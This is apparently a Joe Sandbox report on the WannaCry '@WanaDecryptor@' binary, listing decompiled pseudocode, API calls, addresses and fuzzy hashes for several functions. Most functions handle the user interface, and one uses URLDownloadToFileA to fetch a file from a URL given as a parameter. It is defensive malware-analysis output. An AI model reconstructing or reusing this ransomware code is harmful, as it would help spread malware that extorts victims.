						memcpy(_t67 + _t45 + _t45, _t67, memcpy(0, _t67, _t45 << 2) & 0x00000003);
						_t69 = _t69 + 0x1c;
						_t53 = 0;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_v4 = 0xffffffff;
				_t23 = E00411C00(_t33);
				 *0x4220dc = _t23;
				if(_t23 == _t53) {
					_push(8);
					L00412CEC();
					 *_t23 = 1;
					 *((intOrPtr*)(_t23 + 4)) = _t33;
					 *[fs:0x0] = _v24;
					return _t23;
				} else {
					if(_t33 != _t53) {
						_t25 =  *((intOrPtr*)(_t33 + 0x138));
						if(_t25 != _t53) {
							_push(_t25);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_t26 =  *((intOrPtr*)(_t33 + 0x13c));
						 *((intOrPtr*)(_t33 + 0x138)) = _t53;
						if(_t26 != _t53) {
							_push(_t26);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_push(_t33);
						 *((intOrPtr*)(_t33 + 0x13c)) = _t53;
						L00412C98();
						_t69 = _t69 + 4;
					}
					 *[fs:0x0] = _v24;
					return 0;
				}
			}




















                                  0x004127e0
                                  0x004127e2
                                  0x004127e7
                                  0x004127ed
                                  0x004127ee
                                  0x004127f5
                                  0x004127f8
                                  0x004127fd
                                  0x00412802
                                  0x00412804
                                  0x00412807
                                  0x0041280b
                                  0x0041280f
                                  0x00412813
                                  0x0041287d
                                  0x00412815
                                  0x00412816
                                  0x0041281c
                                  0x0041281e
                                  0x00412825
                                  0x0041282f
                                  0x00412835
                                  0x0041283b
                                  0x00412844
                                  0x00412846
                                  0x00412848
                                  0x00412849
                                  0x0041285a
                                  0x00412860
                                  0x00412862
                                  0x00412868
                                  0x0041286c
                                  0x00412876
                                  0x00412876
                                  0x00412878
                                  0x00412878
                                  0x0041287a
                                  0x0041288b
                                  0x0041288c
                                  0x0041288d
                                  0x00412890
                                  0x00412898
                                  0x0041289f
                                  0x004128a4
                                  0x004128f8
                                  0x004128fa
                                  0x00412906
                                  0x0041290c
                                  0x00412911
                                  0x0041291b
                                  0x004128a6
                                  0x004128a8
                                  0x004128aa
                                  0x004128b2
                                  0x004128b4
                                  0x004128b5
                                  0x004128ba
                                  0x004128ba
                                  0x004128bd
                                  0x004128c3
                                  0x004128cb
                                  0x004128cd
                                  0x004128ce
                                  0x004128d3
                                  0x004128d3
                                  0x004128d6
                                  0x004128d7
                                  0x004128dd
                                  0x004128e2
                                  0x004128e2
                                  0x004128ed
                                  0x004128f7
                                  0x004128f7

                                  APIs
                                  • #823.MFC42(00000244,?,00000428,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
                                  • #823.MFC42(?,?,?), ref: 00412849
                                  • #825.MFC42(?), ref: 004128B5
                                  • #825.MFC42(?), ref: 004128CE
                                  • #825.MFC42(00000000), ref: 004128DD
                                  • #823.MFC42(00000008), ref: 004128FA
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #823#825
                                  • String ID:
                                  • API String ID: 89657779-0
                                  • Opcode ID: 2789b4e0e235f4ab8dcea02542dbd19971487fc096c6531db9c1eddfb55465f8
                                  • Instruction ID: dc1b5eec0fc78afcb49772100b5c76d6e8760601cde25cb5382a27e7a1041640
                                  • Opcode Fuzzy Hash: 2789b4e0e235f4ab8dcea02542dbd19971487fc096c6531db9c1eddfb55465f8
                                  • Instruction Fuzzy Hash: 8631A5B16006008BDB149F2E8D8169BB6D5FBC4720F18473EF929CB3C1EBB99951C755
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B780 Relevance: 9.1, APIs: 6, Instructions: 68filenetworkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E0040B780(signed int __ecx, CHAR* _a4, char* _a8) {
				intOrPtr _v12;
				void _v259;
				char _v260;
				char _v264;
				char _v284;
				char _t15;
				int _t19;
				CHAR* _t25;
				signed int _t26;
				char* _t40;

				_t26 = __ecx;
				_t25 = _a4;
				CreateDirectoryA(_t25, 0);
				_t40 = _a8;
				asm("repne scasb");
				if( !(_t26 | 0xffffffff) == 1) {
					L4:
					return 0;
				} else {
					_t15 =  *0x421798; // 0x0
					_v260 = _t15;
					memset( &_v259, 0, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetTempFileNameA(_t25, "t", 0,  &_v260);
					_t19 = DeleteUrlCacheEntry(_t40);
					_push(0);
					_push(0);
					_push( &_v264);
					_push(_t40);
					_push(0);
					L004133CE();
					if(_t19 != 0 || E0040B6A0(_t25,  &_v284, _v12) == 0) {
						DeleteFileA( &_v284);
						goto L4;
					} else {
						DeleteFileA( &_v284);
						return 1;
					}
				}
			}













                                  0x0040b780
                                  0x0040b787
                                  0x0040b793
                                  0x0040b799
                                  0x0040b7a7
                                  0x0040b7ac
                                  0x0040b81d
                                  0x0040b826
                                  0x0040b7ae
                                  0x0040b7ae
                                  0x0040b7b8
                                  0x0040b7c2
                                  0x0040b7c8
                                  0x0040b7d3
                                  0x0040b7d4
                                  0x0040b7db
                                  0x0040b7e1
                                  0x0040b7e7
                                  0x0040b7e9
                                  0x0040b7ea
                                  0x0040b7eb
                                  0x0040b7ed
                                  0x0040b7f4
                                  0x0040b815
                                  0x00000000
                                  0x0040b827
                                  0x0040b82c
                                  0x0040b83d
                                  0x0040b83d
                                  0x0040b7f4

                                  APIs
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000428), ref: 0040B793
                                  • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                  • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                  • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                  • DeleteFileA.KERNEL32(?), ref: 0040B815
                                  • DeleteFileA.KERNEL32(?), ref: 0040B82C
                                    • Part of subcall function 0040B6A0: CreateDirectoryA.KERNELBASE(?,00000000,?,76C53310,00000000,00000428), ref: 0040B6B4
                                    • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete$CreateDirectory$CacheDownloadEntryNameTemp
                                  • String ID:
                                  • API String ID: 361195595-0
                                  • Opcode ID: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                  • Instruction ID: f6bba9489874f0a6e7d9c3b0bbe4d647d3eb1ae806ee8fe5932772f512dcd3e1
                                  • Opcode Fuzzy Hash: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                  • Instruction Fuzzy Hash: 24112B76100300BBE7209B60DC85FEB379CEBC4321F00C82DF659921D1DB79550987EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409A40 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00409A40(signed int* _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr* _v24;
				struct tagRECT _v40;
				intOrPtr _v56;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v88;
				intOrPtr _t34;
				void* _t35;
				void* _t53;
				intOrPtr _t56;

				 *[fs:0x0] = _t56;
				_v40.right = 0;
				_v40.top = 0x41679c;
				_v4 = 0;
				E00409D40( &(_v40.bottom), _a4, _a8);
				OffsetRect( &_v40,  ~( *_a4),  ~(_a4[1]));
				L00412D5E();
				L00413010();
				_t34 =  *_v24;
				_t35 =  *((intOrPtr*)( *( *_a4) + 0x64))(0, 0, _t34,  *((intOrPtr*)(_t34 - 8)),  &_v68, CreateRectRgn(_v40, _v40.top, _v40.right, _v40.bottom), _t53,  *[fs:0x0], E00414220, 0xffffffff);
				L00412D52();
				_v88 = 0x415c00;
				_v56 = 1;
				L00412D52();
				 *[fs:0x0] = _v64;
				return _t35;
			}














                                  0x00409a4e
                                  0x00409a5d
                                  0x00409a65
                                  0x00409a73
                                  0x00409a82
                                  0x00409a9b
                                  0x00409ac0
                                  0x00409acc
                                  0x00409ad7
                                  0x00409ae4
                                  0x00409aeb
                                  0x00409af0
                                  0x00409afc
                                  0x00409b04
                                  0x00409b0e
                                  0x00409b18

                                  APIs
                                  • OffsetRect.USER32(?,?,?), ref: 00409A9B
                                  • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
                                  • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
                                  • #5781.MFC42(0041679C,00000000), ref: 00409ACC
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414Rect$#1641#5781CreateOffset
                                  • String ID:
                                  • API String ID: 2675356817-0
                                  • Opcode ID: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                  • Instruction ID: 08eaaa51a6c0e03944d0349f6c05153d0be232de021c7e29130ffbf32961e4dd
                                  • Opcode Fuzzy Hash: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                  • Instruction Fuzzy Hash: 7621E9B5204701AFD304DF14C995FABB7E8EB88B04F108A1DF58697291CB78EC45CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004034A0 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E004034A0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413620);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0xe8)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                  0x004034a0
                                  0x004034a2
                                  0x004034ad
                                  0x004034ae
                                  0x004034ba
                                  0x004034c6
                                  0x004034d6
                                  0x004034d7
                                  0x004034e0
                                  0x004034e4
                                  0x004034e7
                                  0x004034ef
                                  0x00403519
                                  0x0040351f
                                  0x00403524
                                  0x00403529
                                  0x00403535
                                  0x0040353d
                                  0x0040354b
                                  0x00403555

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                  • Instruction ID: 278ac0b80a8d68711b6ced8a2ef72b48c78586c4dd5442d856e74ad00dc42751
                                  • Opcode Fuzzy Hash: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                  • Instruction Fuzzy Hash: DB113375204741AFC314DF69D985F9BB7E8FB88714F008A1EB55AD3280DB78E8448B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406940 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E00406940(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413E30);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x824)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                  0x00406940
                                  0x00406942
                                  0x0040694d
                                  0x0040694e
                                  0x0040695a
                                  0x00406966
                                  0x00406976
                                  0x00406977
                                  0x00406980
                                  0x00406984
                                  0x00406987
                                  0x0040698f
                                  0x004069b9
                                  0x004069bf
                                  0x004069c4
                                  0x004069c9
                                  0x004069d5
                                  0x004069dd
                                  0x004069eb
                                  0x004069f5

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                  • Instruction ID: 6a096d29dde81ab0807628e72033e91f5df492254ff76bbe7bc423a6b66a9ecc
                                  • Opcode Fuzzy Hash: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                  • Instruction Fuzzy Hash: CB113375204741AFC314DF69D985F9BB7E8FB8C714F008A1EB599D3280DB78D8058BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404EB0 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E00404EB0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413870);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x6c)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                  0x00404eb0
                                  0x00404eb2
                                  0x00404ebd
                                  0x00404ebe
                                  0x00404eca
                                  0x00404ed6
                                  0x00404ee3
                                  0x00404ee4
                                  0x00404eed
                                  0x00404ef1
                                  0x00404ef4
                                  0x00404efc
                                  0x00404f26
                                  0x00404f2c
                                  0x00404f31
                                  0x00404f36
                                  0x00404f42
                                  0x00404f4a
                                  0x00404f58
                                  0x00404f62

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                  • Instruction ID: d163b7983d6ef18c2c490a4321b6073019a727c2a72f1ecd8d9e2d5251008e6b
                                  • Opcode Fuzzy Hash: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                  • Instruction Fuzzy Hash: CB113375204701AFC314DF69D985F9BB7E8FB88714F008A1EB599D3280DB78D8058B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404310 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E00404310(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v40;
				intOrPtr _v48;
				void* _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				intOrPtr _v112;
				void* _v128;
				void* _v132;
				void* _t20;
				void* _t22;
				void* _t39;
				intOrPtr _t40;
				intOrPtr _t42;

				_push(0xffffffff);
				_push(E004137A8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t42;
				_t39 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					E004044C0(__ecx, 0);
				}
				L00412DD0();
				_t20 = _t39 + 0x48;
				_v8 = 0;
				L00412DCA();
				L00412DC4();
				L00412DBE();
				_t40 =  *((intOrPtr*)(_t39 + 0x40));
				_t22 =  *((intOrPtr*)(_v112 + 0x64))(0, 0, _t40,  *((intOrPtr*)(_t40 - 8)),  *((intOrPtr*)(_t39 + 0x64)), 1, _t20, _t39);
				_push(_t20);
				L00412DCA();
				_v40 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v48;
				return _t22;
			}


















                                  0x00404316
                                  0x00404318
                                  0x0040431d
                                  0x0040431e
                                  0x00404329
                                  0x00404331
                                  0x00404335
                                  0x00404335
                                  0x0040433f
                                  0x00404344
                                  0x0040434c
                                  0x00404354
                                  0x00404361
                                  0x0040436e
                                  0x00404373
                                  0x00404387
                                  0x0040438a
                                  0x0040438f
                                  0x00404398
                                  0x004043a0
                                  0x004043ab
                                  0x004043b5

                                  APIs
                                  • #470.MFC42(?,00000000), ref: 0040433F
                                  • #5789.MFC42 ref: 00404354
                                  • #5875.MFC42(00000001), ref: 00404361
                                  • #6172.MFC42(?,00000001), ref: 0040436E
                                  • #5789.MFC42(00000000), ref: 0040438F
                                  • #755.MFC42(00000000), ref: 004043A0
                                    • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
                                    • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
                                    • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                    • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
                                    • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                    • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
                                    • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#1641#2860#2864#470#5875#6172#755CreateFontIndirectMessageObjectParentSend
                                  • String ID:
                                  • API String ID: 3301245081-0
                                  • Opcode ID: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                  • Instruction ID: 67bcf298962d36d7fa18f20cd84a87d7b1dd540c5c31f1d51ecab4020f7c2e08
                                  • Opcode Fuzzy Hash: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                  • Instruction Fuzzy Hash: 4611CE71104300AFC310EF14D841FDAB7A4EF94724F008A1EF5A6932D0CBB8A484CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403EB0 Relevance: 9.0, APIs: 6, Instructions: 24COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E00403EB0(void* __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				_push(_t9);
				_push(0x407);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(0x408);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(2);
				L00412CE6();
				L00412D88();
				return __eax;
			}




                                  0x00403eb2
                                  0x00403eb8
                                  0x00403eb9
                                  0x00403ebe
                                  0x00403ec5
                                  0x00403eca
                                  0x00403ecb
                                  0x00403ed2
                                  0x00403ed9
                                  0x00403ede
                                  0x00403edf
                                  0x00403ee3
                                  0x00403eea
                                  0x00403ef1

                                  APIs
                                  • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                  • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                  • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                  • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                  • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                  • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2642#3092
                                  • String ID:
                                  • API String ID: 2547810013-0
                                  • Opcode ID: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                  • Instruction ID: 4bb7b71439f2442b6829c2e1ec9f7e71f44d4abaae38a5a684cddd693ffb540b
                                  • Opcode Fuzzy Hash: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                  • Instruction Fuzzy Hash: 46D0ECB179425427D9543273AE1BD9F4959AFE1B15B10052FB301EB2C2ECFC58A282AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406EF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E00406EF0(void* __ecx, char* _a4, void** _a8) {
				char* _v4;
				char _v8;
				void* _v12;
				char* _t14;
				char _t15;
				char* _t17;
				struct HWND__* _t18;
				char _t23;

				_t14 = _a4;
				if(_t14[0xc] != 0x201) {
					L5:
					 *_a8 = 0;
					return _t14;
				}
				_t23 = _t14[0x18];
				_t15 = _t14[0x1c];
				_v8 = _t15;
				_t17 = _t15 - _t23 + 1;
				_v12 = _t23;
				_push(_t17);
				L00412CEC();
				_v4 = _t17;
				if(_t17 != 0) {
					_t18 = __ecx + 0x4c0;
					if(_t18 != 0) {
						_t18 =  *(_t18 + 0x20);
					}
					SendMessageA(_t18, 0x44b, 0,  &_v12);
					ShellExecuteA(0, "open", _v4, 0, 0, 5);
					_t14 = _v4;
					_push(_t14);
					L00412C98();
					goto L5;
				}
				return _t17;
			}











                                  0x00406ef0
                                  0x00406f01
                                  0x00406f6a
                                  0x00406f6e
                                  0x00000000
                                  0x00406f6e
                                  0x00406f03
                                  0x00406f06
                                  0x00406f09
                                  0x00406f0f
                                  0x00406f10
                                  0x00406f14
                                  0x00406f15
                                  0x00406f1d
                                  0x00406f23
                                  0x00406f25
                                  0x00406f2d
                                  0x00406f2f
                                  0x00406f2f
                                  0x00406f3f
                                  0x00406f57
                                  0x00406f5d
                                  0x00406f61
                                  0x00406f62
                                  0x00000000
                                  0x00406f67
                                  0x00406f78

                                  APIs
                                  • #823.MFC42(?), ref: 00406F15
                                  • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
                                  • #825.MFC42(?), ref: 00406F62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
